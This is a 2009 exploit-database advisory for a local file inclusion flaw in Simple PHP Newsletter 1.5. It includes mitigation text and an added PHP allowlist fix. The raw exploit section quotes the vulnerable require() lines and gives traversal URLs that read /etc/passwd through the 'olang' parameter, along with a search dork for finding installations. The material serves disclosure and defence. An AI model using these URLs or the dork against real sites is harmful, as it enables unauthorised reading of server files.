vendor: Simple PHP Newsletter
by: ahmadbady
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 98
Product Name: Simple PHP Newsletter
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: CVE not provided
CPE: a:simple_php_newsletter:simple_php_newsletter:1.5
Other Scripts:
Platforms Tested:
2009

Simple PHP Newsletter 1.5 Local File Include Vulnerability

The Simple PHP Newsletter 1.5 script is vulnerable to local file inclusion. The vulnerability exists in the 'mail.php' and 'mailbar.php' files, where the 'olang' parameter is not properly sanitized before being used in a require statement, allowing an attacker to include arbitrary local files. By manipulating the 'olang' parameter, an attacker can include sensitive files, such as the '/etc/passwd' file, which may contain hashed passwords and other system information.

Mitigation:

To mitigate this vulnerability, ensure that user-supplied input is properly sanitized and validated before being used in file inclusion statements. Additionally, it is recommended to restrict file inclusion to a whitelist of allowed files or directories.
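
One way to apply the whitelist recommendation above, as an added example (not code from Simple PHP Newsletter or from the advisory's author): the requested language is matched against the files that actually exist in the language directory, and anything else falls back to a default. The function name `resolve_lang_file()`, the `english.php` default and the `*.php` naming of language files are assumptions.

```php
<?php
// Added example, not the project's code. resolve_lang_file(), the *.php
// naming of language files and the default file name are assumptions.

function resolve_lang_file($requested, string $langDir, string $default): string
{
    $base = realpath($langDir);
    if ($base === false) {
        throw new RuntimeException('language directory missing');
    }
    // Allowlist: only files that actually exist directly under lang/.
    $allowed = [];
    foreach (glob($base . '/*.php') ?: [] as $path) {
        $allowed[basename($path)] = $path;
    }
    if (!isset($allowed[$default])) {
        throw new RuntimeException('default language file missing');
    }
    // Arrays (olang[]=x), slashes, NUL bytes and ../ sequences never equal
    // an allowlisted file name, so they fall back to the default.
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return $allowed[$default];
    }
    // Defence in depth: a symlink placed in lang/ must not point outside it.
    $real = realpath($allowed[$requested]);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return $allowed[$default];
    }
    return $real;
}

// In mail.php / mailbar.php this call would replace require("lang/".$olang):
//   require resolve_lang_file($_GET['olang'] ?? null, __DIR__ . '/lang', 'english.php');

// Constructed demo: a throwaway lang/ directory with two language files.
$dir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/english.php", '<?php $l = "en";');
file_put_contents("$dir/german.php", '<?php $l = "de";');

$inputs = ['german.php', '../../../../../../etc/passwd', ['x'], 'missing.php'];
foreach ($inputs as $in) {
    $label = json_encode($in, JSON_UNESCAPED_SLASHES);
    printf("%-32s -> %s\n", $label, basename(resolve_lang_file($in, $dir, 'english.php')));
}
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

Reading the value from `$_GET` explicitly also removes the dependency on `register_globals`, which the original `isset($olang)` check relies on.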

Exploit-DB raw data:

                                   --:local file include:--
---------------------------------  
script:Simple PHP Newsletter 1.5
   
----------------------------------------------
download from:http://quirm.net/download/23/
   
----------------------------------------------

...............................................
vul:/mail.php line 11:

if(isset($olang)) 
{
require("lang/".$olang); // line 11
-------------------------------------------
vul:/mailbar.php line 5:

<?php
include("config.inc.php");
if(isset($olang))
{
require("lang/".$olang); // line 5
-------------------------------------------


----------------------------------------------------

dork:"Powered by Simple PHP Text newsletter"
----------------------------------------------------

xpl:

http://127.0.0.1/path/mail.php?olang=../../../../../../etc/passwd

http://127.0.0.1/path/mailbar.php?olang=../../../../../../etc/passwd

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from:[iran]
---------------------------------------------------

# milw0rm.com [2009-01-16]